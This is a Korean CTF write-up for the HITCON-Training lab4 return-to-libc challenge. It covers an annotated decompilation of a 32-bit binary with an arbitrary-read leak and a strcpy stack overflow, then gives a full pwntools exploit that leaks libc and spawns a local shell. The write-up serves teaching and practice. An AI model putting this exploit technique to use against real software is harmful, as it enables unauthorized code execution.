[HITCON-Training] lab4

2019. 11. 4. 08:19 · Wargame & CTF/HITCON-Training

HITCON-Training lab4

Summary

  • 32bit

  • return to libc

Analysis

main

/*
 * IDA-style decompilation of the lab binary's main (i386, see the
 * checksec output further down: no PIE, no stack canary, NX on).
 * Flow: read a decimal number, treat it as an address and hand it to
 * See_something; then read up to 0x100 bytes and hand them to
 * Print_message.  Both helpers are listed below this function.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
 char **v3; // ST04_4  -- never assigned below; decompiler artifact for strtol's endptr (presumably NULL -- confirm in disassembly)
 int v4; // ST08_4  -- never assigned below; decompiler artifact for strtol's base (presumably 10 -- confirm in disassembly)
 char src; // [esp+12h] [ebp-10Eh]  -- 0x100 bytes lie between src and buf, exactly the read() size below
 char buf; // [esp+112h] [ebp-Eh]   -- 0xA bytes are read into it; sits directly below v8
 _DWORD *v8; // [esp+11Ch] [ebp-4h]

 puts("###############################");
 puts("Do you know return to library ?");
 puts("###############################");
 puts("What do you want to see in memory?");
 printf("Give me an address (in dec) :");
 fflush(stdout);
 read(0, &buf, 0xAu);
 /* The parsed integer becomes a pointer with no range or alignment
    check; whatever the user typed is dereferenced in See_something. */
 v8 = (_DWORD *)strtol(&buf, v3, v4);
 /* Arbitrary 4-byte read.  Because the binary is not PIE, GOT entries
    are at fixed addresses, so this leaks a libc address and defeats
    libc ASLR.  Full RELRO would not stop the read itself; PIE and
    validating the address against a known-safe range would. */
 See_something(v8);
 printf("Leave some message for me :");
 fflush(stdout);
 /* read() does not NUL-terminate: a full 0x100-byte input runs straight
    into buf without a terminator before Print_message strcpy's it. */
 read(0, &src, 0x100u);
 /* Print_message copies src with an unbounded strcpy into a buffer
    0x38 bytes below its saved frame pointer -- the stack overflow. */
 Print_message(&src);
 puts("Thanks you ~");
 return 0;
}

See_something

/*
 * Prints the 4-byte word stored at a caller-supplied address.
 * a1 comes straight from user input in main, so this is an
 * arbitrary-address read primitive; an unmapped or NULL a1 faults
 * here.  %p is handed an integer rather than a pointer -- on i386
 * this just prints the word as 0x-prefixed hex, which is what the
 * exploit below parses.  Returns printf's result.
 */
int __cdecl See_something(_DWORD *a1)
{
 return printf("The content of the address : %p\n", *a1);
}

Print_message

/*
 * Copies the caller's string into a stack buffer and echoes it.
 * dest sits 0x38 bytes below the saved frame pointer and strcpy has
 * no length bound, so any input longer than 0x38 bytes overwrites
 * saved ebp and then the return address.  The binary has no stack
 * canary (checksec output below), so the corruption goes undetected
 * until ret.  A bounded copy, e.g. snprintf(dest, sizeof dest, "%s",
 * src) with dest declared as an array, plus a canary, would close
 * this.  The printf format itself is fixed, so there is no format
 * string issue here.  Returns printf's result.
 */
int __cdecl Print_message(char *src)
{
 char dest; // [esp+10h] [ebp-38h]  -- 0x38 bytes to saved ebp, 0x3C to the return address

 strcpy(&dest, src);
 return printf("Your message is : %s", &dest);
}

See_something에서 printf의 GOT 주소를 입력하면 printf의 실제 주소가 출력된다. main에서 첫 입력을 받아 See_something으로 넘기고, 두 번째 입력은 Print_message에서 dest에 strcpy로 복사되는데 거기서 오버플로우가 터진다. 유출된 printf 주소로 libc_base를 구하고 system의 주소를 구한다. 그리고 libc 안에 있는 "/bin/sh" 문자열의 주소를 구해 준다.

Exploit

from pwn import *

# Local pwntools session against the lab binary. Written for Python 2
# pwntools: str and p32() output are concatenated directly below; under
# Python 3 the payload would have to be bytes.
e = ELF("./ret2lib")
p = process("./ret2lib")
libc = e.libc  # libc the local loader will map for this process

# Unused: the sendline that would have used it is commented out below;
# the "/bin/sh" string is instead located inside libc.
binsh = "/bin/sh\x00"
# Static address inside the non-PIE binary used as system()'s return
# address. The name suggests a pop/ret gadget, but the gadget itself is
# not shown on this page -- confirm against the disassembly.
pr = 0x8048399

# Step 1: answer "Give me an address (in dec) :" with printf's GOT slot.
# This only works because the binary is not PIE (fixed GOT address).
p.recvuntil(":")
p.sendline(str(e.got["printf"]))

# Step 2: See_something prints the slot with %p; take the 8 hex digits
# after "0x" and rebase libc from printf's known offset. This one leak
# is what defeats libc ASLR for the rest of the run.
p.recvuntil("0x")
printf_addr = int("0x" + p.recv(8), 0)
libc_base = printf_addr - libc.symbols["printf"]

# Step 3: "Leave some message for me :" -> Print_message's strcpy.
p.recvuntil(":")

# dest is 0x38 bytes below saved ebp (see the decompilation), so 0x38
# bytes fill the buffer, 4 more cover saved ebp, and the next dword
# replaces the return address. A stack canary would abort here.
payload = ""
payload += "A"*(0x38+0x4)
payload += p32(libc_base + libc.symbols["system"])   # new return address
payload += p32(pr)                                    # system()'s return address
payload += p32(libc_base + list(libc.search("/bin/sh"))[0])  # system()'s argument

# send, not sendline: a trailing newline would land past the argument.
p.send(payload)
#p.sendline(binsh)
p.interactive()
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab4$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab4/ret2lib'
  Arch:     i386-32-little
  RELRO:   Partial RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x8048000)
[+] Starting local process './ret2lib': pid 4729
[*] '/lib/i386-linux-gnu/libc.so.6'
  Arch:     i386-32-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     PIE enabled
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) 그룹들=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

